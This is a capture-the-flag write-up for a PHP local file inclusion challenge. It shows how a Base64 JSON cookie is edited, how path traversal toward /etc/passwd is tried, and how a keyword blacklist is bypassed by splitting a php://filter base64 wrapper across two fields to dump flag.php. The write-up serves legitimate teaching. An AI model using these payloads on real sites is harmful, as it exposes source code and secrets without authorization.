Advent of CTF - Challenge 11

“Filter”

Challenge

Building on the previous challenge this adds a layer of complexity due to filtering and the use of multiple elements to achieve an exfiltration.

In this challenge you will learn:

  • How to detect filtering
  • How to use php://filter

Solution

Santa’s book of secrets has upgraded its security. All should be fine now.

The challenge starts with the same page as in Challenge 10. As the description says that the security has been upgraded, it is fair to assume it is the same type of challenge, only with some added security features.

the-challenge.png
Figure 1: The start of the challenge

Direct access to flag.php leads to the text Direct access not permitted. This means that this time it is not possible to get the flag from this page directly.

cookie.png
Figure 2: The cookie

As with the previous challenge, there is a cookie for zerooneone.

eyJwYXRoIjoiLiIsInBhZ2UiOiJtYWluIn0=

As with almost all previous challenges a Base64 encoded string, a JSON structure, is stored in the cookie. Decoding it reveals 2 keys; path and page. The current values are ., for the current directory and main for the main.php page.

{"path":".", "page":"main" }

The first thing to try is to change the page value to flag. This should include the flag.php file that is there according to the description.

{"path":".", "page":"flag" }

This, however, results in an error message. The message at the end of the line is no direct access, so apparently the file is there, but direct access to it is not allowed.

flag-include.png
Figure 3: Direct access error message

Playing around with this payload might make you try to change the path. When you use more then 1 . the path will also throw an error.

{"path":"../../../../../../", "page":"/etc/passwd" }

The error message is displayed just like the previous one. So, the flag can not be retrieved directly and navigating the file system also seems to not work.

dots.png
Figure 4: Soo many dots error message

Investigating ways to do a file inclusion in PHP will eventually bring you to extracting data using php://filter. This is part of PHP Wrappers. It basically allows you to filter resources through a conversion tool, such as convert.base64-encode. This seems like a great opportunity.

{"path":".", "page":"php://filter/convert.base64-encode/resource=flag" }

It ends in an error message however. The error message says it is due to blacklist.

blacklist.png
Figure 5: Blacklist error message

So, some words that are used are part of a blacklist. This means that part of the thing that was in the payload was not allowed to be there. Playing with this you will find that the word filter is not allowed in the page value. Similar in the path the word base is not allowed.

Thinking this challenge over the usage of the 2 parts of the JSON structure can be assumed to be something as in the below listing.

include($data["path"] . "/" . $data["page"] . ".php");

Using this knowledge and the insight as to what is allowed in both parts the PHP wrapper can be created as a 2 part string. The first part, with filter, in the path and the second part, with the convert.base64-encode, in the page.

{"path":"php://filter", "page":"convert.base64-encode/resource=flag" }

The payload will result in a big blob of Base64 text to be presented on the page.

extract.png
Figure 6: The encoded flag.php

Decoding the blob of text will show the contents of flag.php. The flag can be retrieved from the code.

flag.png
Figure 7: The flag

Be sure to grab your points and the badge.

badge.png
Figure 8: The badge

Go back to the homepage.